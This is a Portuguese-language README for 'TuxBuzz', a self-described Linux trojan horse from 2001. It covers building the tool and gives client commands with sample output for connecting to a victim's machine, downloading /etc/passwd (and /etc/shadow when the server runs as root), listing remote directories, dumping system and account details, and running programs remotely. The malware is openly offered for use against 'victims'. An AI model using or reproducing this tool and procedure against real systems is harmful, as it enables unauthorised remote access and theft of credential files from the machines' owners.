darthfeio@lycos.com - UIN: 52461929
O que e TuxBuzz ? TuxBuzz e um embrião do que nos costumamos chamar de "cavalo de troia". E composto de dois programas: um programa cliente (tclient) e um programa servidor (tserver). O programa servidor e aquele que e instalado na máquina "da vitima", o cliente e o que deve ser insta lado na máquina de quem vai "bisbilhotar" a maquina da vítima. O cli ente e o servidor se comunicam por meio de uma conexao TCP/IP. Depois que o servidor e instaldo na máquina, ele abrira uma porta (a padrao e 8081) e ficara em escuta a espera de uma requisição do cliente. O servidor ira assumir a identidade de quem iniciou o processo, de forma que os privilégios de acesso ao sistema de arquivos da máquina "infec tada" serão os mesmos de quem iniciou o programa servidor.
Compilação e instalação:
nenhuma novidade:
tar -xzvf tuxbuzz-x.x.x.tar.gz
cd tuxbuzz-x.x.x
make
make install : )
testando:
execute o servidor em um terminal:
./tserver
TuXBuZZ Server 0.0.1b bY DoC#include listening
on port 8081 (this version was compiled for debuging)
em outro terminal, execute o cliente:
./tclient
********************************************************
TuXBuZZ Client v0.0.1b bY DoC#include
CopyRight 2001 All Rights Reserved
This Software is Registered under the
GNU Public License
********************************************************
tuxbuzz>
por enquanto, os comandos sao bem simples. E possivel extrair informa ções da maquina (S.O, processador, etc), do usuario que iniciou o pro cesso,baixar arquivos para a maquina do cliente, listar os arquivos do servidor e andar pela árvore de diretórios. Também é possível executar programas no servidor.
conectando:
tuxbuzz> connect <endereco_ip> [porta]
exemplo:
tuxbuzz> connect 127.0.0.1 8081 <ENTER>
connected to 127.0.0.1 on port 8081
Wellcome to TuXBuZZ server v0.0.1b (not
running as root)
tuxbuzz>
A mensagen de boas vindas dependera de
se o servidor estiver rodando como usuario ou como root. Se estiver rodando
como root, você verá uma mensagen diferente:
tuxbuzz> connect 127.0.0.1 8081 <ENTER>
connected to 127.0.0.1 on port 8081
OWWWWWWWW SHIIIIIIIIT !!!!!!!!! NoT OnLY
WinDoZe can bE HacKed.
Wellcome to TuXBuZZ server v0.0.1b running
as ROOT !!! Good Luck !
tuxbuzz>
para pegar um arquivo:
tuxbuzz> get <arquivo_remoto> <arquivo_local>
(como se fosse um ftp) exemplo:
tuxbuzz> get /etc/passwd
/home/xyz/passwd <ENTER>
downloaded file /etc/passwd as /home/xyz/passwd
(582 bytes total)
faz o download do arquivo /etc/passwd do
servidor para a sua maquina nomeando-o como /home/xyz/passwd
obs1: cuidado ! voce nao
podera fazer um "get /etc/shadow" a nao ser que o servidor esteja rodando
como root...mas se estiver, vc podera baixar o que bem entender ! Por isso
e que esse programa, apesar de ainda ser um embriao, pode ser realmente
perigoso : (.
obs2: se você nao
fornecer o nome do arquivo local, o conteudo do arquivo remoto sera jogado
diretamente para a saida padrao (a tela) como se fosse um "cat" remoto.
Isso e bom se voce quiser apenas visualizar o conteudo de um arquivo texto
(mas tome cuidado para nao fazer isso com arquivos binarios : )).
pegando informacoes básicas:
tuxbuzz> rinfo <remote> ou
tuxbuzz> rinfo <user>
tuxbuzz> rinfo remote <ENTER>
OS: Linux
Machine Name: comasseto
Release: 2.0.2
Version: #1 Sat Aug 18 14:24:50 BRT 2001
Machine: i586
tuxbuzz>
tuxbuzz> rinfo user <ENTER>
Username: root #oooopppsss !!!!!
User Password: x #nao tao rapido, tio
!!!
User ID: 0
Group ID: 0
Comment:
Home Directory: /root
Shell: /bin/bash
tuxbuzz>
fechando a conexao:
tuxbuzz> close <ENTER>
connection closed. 28 bytes sended, 1998
bytes received.
tuxbuzz>
obtendo ajuda dos comandos:
tuxbuzz> help <ENTER>
listando diretórios do servidor
(igual a um FTP):
tuxbuzz> ls <ENTER>
total 16
drwxr-xr-x 2 docinclude
users 4096 Nov 1 20:41 ./
drwxr-xr-x 4 docinclude
users 4096 Nov 1 20:18 ../
drwxr-xr-x 2 docinclude
users 8394 Nov 1 20:41 index.html
drwxr-xr-x 2 docinclude
users 6096 Nov 1 20:41 tclient
tuxbuzz>
caminhando entre diretórios:
tuxbuzz> cd /etc <ENTER>
Current working directory now: /etc (14)
tuxbuzz>
mostrando o diretório em que
está no servidor:
tuxbuzz> pwd <ENTER>
/etc/rc.d
tuxbuzz>
executando comandos do shell no cliente
sem ter que sair do programa:
basta iniciar o comando com um "!" (exclamação).
O programa irá enviar o comando para o shell e você poderá
ver
a saída normalmente:
exemplo:
tuxbuzz> ! ls -laF <ENTER>
total 20
drwxr-xr-x 2 docinclude
users 4096 Nov 1 20:41 ./
drwxr-xr-x 4 docinclude
users 4096 Nov 1 20:18 ../
drwxr-xr-x 2 docinclude
users 8394 Nov 1 20:41 README
tuxbuzz>
executando programas no servidor (ainda
não está completamente funcional)
tuxbuzz> exec gimp <ENTER>
saindo do programa:
tuxbuzz> quit <ENTER>
xyz@blablabla:~/tuzbuzz-0.0.1b$
E por enquanto e isso ai... enjoy !
bY DoC#include
